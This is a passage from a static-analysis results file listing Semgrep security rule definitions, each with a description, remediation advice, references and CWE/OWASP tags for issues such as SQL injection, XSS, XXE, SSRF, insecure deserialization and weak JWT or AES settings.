go.gin.ssrf.gin-tainted-url-host.gin-tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"help":{"markdown":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel)\n - [https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ](https://yaml.readthedocs.io/en/latest/basicuse.html?highlight=typ)\n","text":"Avoid using unsafe `ruamel.yaml.YAML()`. `ruamel.yaml.YAML` can create arbitrary Python objects. A malicious actor could exploit this to run arbitrary code. Use `YAML(typ='rt')` or `YAML(typ='safe')` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","id":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","name":"python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-unsafe-ruamel.avoid-unsafe-ruamel"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit."},"help":{"markdown":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"AES symmetric cryptographic operations were identified using a key size of 128bit which is less than the industry standard recommendation of 256bit."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","id":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","name":"swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-aes-keysize.insecure-crypto-aes-keysize"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"help":{"markdown":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw)\n - [https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===](https://stackoverflow.com/questions/4251284/raw-vs-html-safe-vs-h-to-unescape-html#:~:text===)\n - [https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027](https://medium.com/sumone-technical-blog/a-pretty-way-to-unescape-html-in-a-ruby-on-rails-application-efc22b850027)\n","text":"'raw' renders raw HTML, as the name implies. This means that normal HTML escaping is bypassed. If user data can be controlled here, this exposes your application to cross-site scripting (XSS). If you need to do this, be sure to correctly sanitize the data using a library such as DOMPurify."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","id":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","name":"ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.avoid-raw.avoid-raw"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside `...`. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-subshell.dangerous-subshell","id":"ruby.lang.security.dangerous-subshell.dangerous-subshell","name":"ruby.lang.security.dangerous-subshell.dangerous-subshell","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-subshell.dangerous-subshell"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"help":{"markdown":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected a network listener listening on 0.0.0.0 or an empty string. This could unexpectedly expose the server publicly as it binds to all available interfaces. Instead, specify another IP address that is not 0.0.0.0 nor the empty string."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","id":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","name":"go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.bind_all.avoid-bind-to-all-interfaces"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"help":{"markdown":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection)\n - [https://laravel.com/docs/8.x/queries](https://laravel.com/docs/8.x/queries)\n","text":"Detected a SQL query based on user input. This could lead to SQL injection, which could potentially result in sensitive data being exfiltrated by attackers. Instead, use parameterized queries and prepared statements."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-sql-injection.laravel-sql-injection","id":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","name":"php.laravel.security.laravel-sql-injection.laravel-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-sql-injection.laravel-sql-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","id":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","name":"kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.postgres-taint.postgres-taint","id":"rust.hyper.sql.postgres-taint.postgres-taint","name":"rust.hyper.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","id":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","name":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"help":{"markdown":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md)\n","text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","id":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","name":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-direct-response-write.laravel-direct-response-write"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"help":{"markdown":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone)\n - [https://pkg.go.dev/github.com/gorilla/sessions#Options](https://pkg.go.dev/github.com/gorilla/sessions#Options)\n","text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"helpUri":"https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","id":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","name":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"help":{"markdown":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses)\n","text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","id":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","name":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.xss.xss)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"helpUri":"https://semgrep.dev/r/javascript.browser.xss.xss","id":"javascript.browser.xss.xss","name":"javascript.browser.xss.xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.xss.xss"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"help":{"markdown":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization)\n - [https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/](https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)\n","text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"helpUri":"https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","id":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","name":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg","id":"javascript.jose.security.jwt-none-alg.jwt-none-alg","name":"javascript.jose.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg","id":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","name":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.jjwt.security.jwt-none-alg.jjwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","id":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","name":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - 